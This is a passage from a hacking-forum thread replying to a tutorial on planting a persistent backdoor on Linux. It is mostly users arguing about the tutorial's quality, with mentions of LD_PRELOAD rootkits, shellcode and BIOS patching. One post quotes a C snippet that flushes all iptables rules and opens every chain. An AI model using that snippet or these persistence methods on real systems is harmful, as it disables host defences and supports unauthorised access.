Sinisterly
Tutorial Installing a persistent backdoor on Linux - Printable Version

+- Sinisterly (https://sinister.ly)
+-- Forum: Hacking (https://sinister.ly/Forum-Hacking)
+--- Forum: Tutorials (https://sinister.ly/Forum-Tutorials)
+--- Thread: Tutorial Installing a persistent backdoor on Linux (/Thread-Tutorial-Installing-a-persistent-backdoor-on-Linux)

Pages: 1 2


RE: Installing a persistent backdoor on Linux - roger_smith - 05-23-2015

For what it's worth I did find this somewhat interesting to read. I don't think there's anything wrong with sharing the info.

Those who criticize I'd ask that you also contribute to some degree in how you would tackle the same scenario. Tutorials and case studies are always great to have Smile


RE: Installing a persistent backdoor on Linux - warstrike - 05-23-2015

(05-23-2015, 11:21 PM)Dyme Wrote: Lmao gtfo of here with this shit, $100 bucks you use a ld_preload kit.

Glad I can deny this. I don't kit unless it's the target is of value. All I use mostly is a polymorphic /bin/sh shellcode. Otherwise I use flashrom to patch the bios with another compatible firmware bundled with my kit. However I'll bet $100 you use an ld_preload, hmm say umbreon? Lol rippr


RE: Installing a persistent backdoor on Linux - Dyme - 05-23-2015

(05-23-2015, 11:44 PM)warstrike Wrote: Glad I can deny this. I don't kit unless it's the target is of value. All I use mostly is a polymorphic /bin/sh shellcode. Otherwise I use flashrom to patch the bios with another compatible firmware bundled with my kit. However I'll bet $100 you use an ld_preload, hmm say umbreon? Lol rippr

>mentions 'polymorphic shellcode'

oh I'm sorry I didn't realize I was talking to a real hacker here.


RE: Installing a persistent backdoor on Linux - warstrike - 05-23-2015

(05-23-2015, 11:47 PM)Dyme Wrote: >mentions 'polymorphic shellcode'

oh I'm sorry I didn't realize I was talking to a real hacker here.

I'm not


RE: Installing a persistent backdoor on Linux - blackhatcat - 05-24-2015

(05-23-2015, 11:33 PM)Cyph3rX Wrote: This is just to teach people the basics of how to do something like this, this could be useful for people new to Linux who have no idea where to start.

If your target audience are beginners then don't teach them fucking bullshit. There are a hundred times better methods to backdoor a *nix box that are just as easy for a beginner to understand if you explain well enough.


RE: Installing a persistent backdoor on Linux - tropic - 07-04-2015

Code:
#ifdef IPTABLES void flush_iptables(void) { system("iptables -X 2> /dev/null"); system("iptables -F 2> /dev/null"); system("iptables -t nat -F 2> /dev/null"); system("iptables -t nat -X 2> /dev/null"); system("iptables -t mangle -F 2> /dev/null"); system("iptables -t mangle -X 2> /dev/null"); system("iptables -P INPUT ACCEPT 2> /dev/null"); system("iptables -P FORWARD ACCEPT 2> /dev/null"); system("iptables -P OUTPUT ACCEPT 2> /dev/null"); } #endif

The coder seems to be afflicted with autism.

[Image: 1032156?v=3&s=460]


RE: Installing a persistent backdoor on Linux - Null_Byte - 08-28-2015

(06-08-2015, 04:13 PM)R3Tak3 Wrote: As a beginner I found this useful. Are there any threads with good examples of APT's?

If by APT you Advanced Persistent Threat...you're using it in the wrong context buddy.

Anyways, This thread could be helpful to some to be honest. The same goes with any information posted here. It all has value to some extent. Whatever you take from it is up to you.